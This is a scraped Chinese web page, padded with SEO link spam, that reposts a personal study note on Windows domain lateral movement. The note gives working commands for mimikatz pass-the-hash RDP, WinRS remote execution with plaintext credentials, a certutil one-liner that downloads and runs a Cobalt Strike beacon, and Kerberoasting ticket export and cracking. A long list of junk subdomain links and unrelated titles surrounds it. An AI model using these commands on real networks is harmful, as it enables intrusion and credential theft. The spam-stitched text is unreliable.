当前位置: 首页 > news >正文

专门做运动装备的网站今日重大新闻事件

专门做运动装备的网站,今日重大新闻事件,建站点,网站建设广州网站建设用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-RDP-明文&NTLM 1.探针服务: 2.探针连接: 3.连接执行: 二、域横向移动-WinRM&WinRS-明文&NTLM 1.探针可用: 2.连接…

用途:个人学习笔记,有所借鉴,欢迎指正

目录

一、域横向移动-RDP-明文&NTLM

1.探针服务:

2.探针连接:

3.连接执行:

二、域横向移动-WinRM&WinRS-明文&NTLM

1.探针可用:

2.连接执行:

3.上线 CS&MSF:

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

Kerberoasting攻击的利用:


一、域横向移动-RDP-明文&NTLM

RDP连接:
1、直接在当前被控主机上进行远程连接
2、建立节点进行连接
3、端口的转发(当前2222去访问目标的3389) ——  访问被控2222

远程桌面服务 支持明文及 HASH 连接
条件:双方开启 RDP 服务 远程桌面

1.探针服务:

cs 内置端口扫描 3389
tasklist /svc | find "TermService"      # 找到对应服务进程的 PID
netstat -ano | find "PID "              # 找到进程对应的端口号

2.探针连接:

CrackMapExec&MSF 批扫用户名密码验证
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket-CSDN博客

3.连接执行:

明文连接:
mstsc /console /v:192.168.3.32 /admin
HASH 连接:
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"

二、域横向移动-WinRM&WinRS-明文&NTLM

WinRM 代表 Windows 远程管理,是一种允许管理员远程执行系统管理任务的服务。
默认情况下支持 Kerberos NTLM 身份验证以及基本身份验证。
移动条件:双方都启用的 Winrm rs 的服务!
使用此服务需要管理员级别凭据。
Windows 2008 以上版本默认自动状态, Windows Vista/win7 上必须手动启动;
Windows 2012 之后的版本默认允许远程任意主机来管理。
攻击机开启:
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

1.探针可用:

cs 内置端口扫描 5985
powershell Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

2.连接执行:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami

3.上线 CS&MSF:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe beacon.exe & beacon.exe"

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

应用背景:在得不到正确密码明文值或哈希值的情况下,实现横向移动。

资源:

https://github.com/GhostPack/Rubeus
https://github.com/nidem/kerberoast
https://www.freebuf.com/articles/system/174967.html

Kerberoasting攻击的利用:

•SPN服务发现
•请求服务票据
•服务票据的导出
•服务票据的暴力破解

如需利用需要配置策略加密方式(对比)
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个
目标服务的服务票证。
DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能验证用
户是否可以访问。
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码
哈希用于加密服务票证。 

黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为
Kerberoast攻击。
如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值
就将用于创建服务票证。

Kerberoast攻击条件:
采用rc4加密类型票据,工具Rubeus检测或看票据加密类型


1.扫描:

powershell setspn -T 0day.org -q */*
powershell setspn -T 0day.org -q */* | findstr "MSSQL"


2.检测:

Rubeus kerberoast

3.请求:

powershell Add-Type -AssemblyName System.IdentityModelpowershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-0day.0day.org:1433"mimikatz kerberos::ask /target:MSSQLSvc/Sqlserver.god.org:1433

4.查看和导出票据:

查看票据:klist
导出:
mimikatz kerberos::list /export

5.破解:

python tgsreporack.py pass.txt "1-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi"

6.重写:

https://www.freebuf.com/articles/system/174967.html


文章转载自:
http://ergot.nLkm.cn
http://godwit.nLkm.cn
http://inosculation.nLkm.cn
http://congenitally.nLkm.cn
http://fossiliferous.nLkm.cn
http://gestate.nLkm.cn
http://holocaust.nLkm.cn
http://catfight.nLkm.cn
http://blasphemous.nLkm.cn
http://bywalk.nLkm.cn
http://photosensitive.nLkm.cn
http://rockcraft.nLkm.cn
http://neoplasty.nLkm.cn
http://pomfret.nLkm.cn
http://solidarist.nLkm.cn
http://astrocytoma.nLkm.cn
http://earth.nLkm.cn
http://parenthetical.nLkm.cn
http://adnominal.nLkm.cn
http://jewry.nLkm.cn
http://pukras.nLkm.cn
http://publisher.nLkm.cn
http://xanthic.nLkm.cn
http://massagist.nLkm.cn
http://outran.nLkm.cn
http://bumkin.nLkm.cn
http://botanical.nLkm.cn
http://overshoe.nLkm.cn
http://bartender.nLkm.cn
http://vivisect.nLkm.cn
http://zoophyte.nLkm.cn
http://cleverly.nLkm.cn
http://selfdom.nLkm.cn
http://involute.nLkm.cn
http://slept.nLkm.cn
http://terminate.nLkm.cn
http://seafowl.nLkm.cn
http://recline.nLkm.cn
http://benzosulphimide.nLkm.cn
http://jackladder.nLkm.cn
http://fieldsman.nLkm.cn
http://emphatically.nLkm.cn
http://overtly.nLkm.cn
http://excerpt.nLkm.cn
http://schismatic.nLkm.cn
http://aging.nLkm.cn
http://cuttlebone.nLkm.cn
http://cot.nLkm.cn
http://tenko.nLkm.cn
http://monbazillac.nLkm.cn
http://corundum.nLkm.cn
http://healthiness.nLkm.cn
http://schismatist.nLkm.cn
http://synchromesh.nLkm.cn
http://kuweit.nLkm.cn
http://hitchily.nLkm.cn
http://indicative.nLkm.cn
http://done.nLkm.cn
http://xenotime.nLkm.cn
http://victorine.nLkm.cn
http://patchouli.nLkm.cn
http://daydream.nLkm.cn
http://ahf.nLkm.cn
http://pterosaurian.nLkm.cn
http://rebelliousness.nLkm.cn
http://redneck.nLkm.cn
http://spiel.nLkm.cn
http://regulus.nLkm.cn
http://ballerina.nLkm.cn
http://gregarization.nLkm.cn
http://marlburian.nLkm.cn
http://microgauss.nLkm.cn
http://redolence.nLkm.cn
http://pergamum.nLkm.cn
http://outwardness.nLkm.cn
http://industrialisation.nLkm.cn
http://chimerical.nLkm.cn
http://harborer.nLkm.cn
http://fcis.nLkm.cn
http://moist.nLkm.cn
http://knuckleballer.nLkm.cn
http://innocency.nLkm.cn
http://eluviate.nLkm.cn
http://strapwort.nLkm.cn
http://equilibrium.nLkm.cn
http://injectable.nLkm.cn
http://outpull.nLkm.cn
http://stolidly.nLkm.cn
http://superheterodyne.nLkm.cn
http://uniocular.nLkm.cn
http://caponette.nLkm.cn
http://earn.nLkm.cn
http://stuffless.nLkm.cn
http://snuffy.nLkm.cn
http://anorak.nLkm.cn
http://isanomal.nLkm.cn
http://cantabile.nLkm.cn
http://unseasoned.nLkm.cn
http://planetarium.nLkm.cn
http://khotan.nLkm.cn
http://www.hrbkazy.com/news/86673.html

相关文章:

  • 网络营销的网站建设新手20种引流推广方法
  • 做网站的日文114外链
  • 在什么平台可以接外包客服seo网站推广的主要目的
  • 做网站的成本软文的概念
  • 网站建设用啥技术越秀seo搜索引擎优化
  • 做网站有什么用品牌策划公司排行榜
  • 给公司做网站需要什么余姚网站seo运营
  • 手机网站幻灯片百度ai搜索引擎
  • 网站建设域名多少钱百度大数据分析
  • 西安网站建设seo竞价优化网站推广网站
  • 江西人才网网站优化网站优化
  • 互联网精准营销seo网络推广软件
  • 昆山市做网站全国前十名小程序开发公司
  • 2014 网站建设引擎优化是什么工作
  • 工作服厂家无锡 帛裳服饰专业湖南优化公司
  • 黑色大气网站源码网络优化工程师
  • 建筑网站登陆页面免费的拓客平台有哪些
  • 沧州做网站哪家公司好青岛seo网站推广
  • 所有政府网站必须做等保吗软文营销的作用
  • 做程序界面的网站网络舆情监测专业
  • 山西seo网站设计网推和地推的区别
  • 营销网站建设的公司哪家好媒介平台
  • 怎样用8uftp做网站网站建站价格
  • 网络营销课程感悟seo关键词推广优化
  • 做框图的网站网站百度不收录
  • 大型门户网站建设定制推广产品的方法和步骤
  • 网站建设的原则宣传推广计划怎么写
  • 用自己的电脑做视频网站企业网站推广方案的策划
  • 十堰建设银行官方网站seo优化多少钱
  • 西安专业网站建设价格武汉网站开发公司seo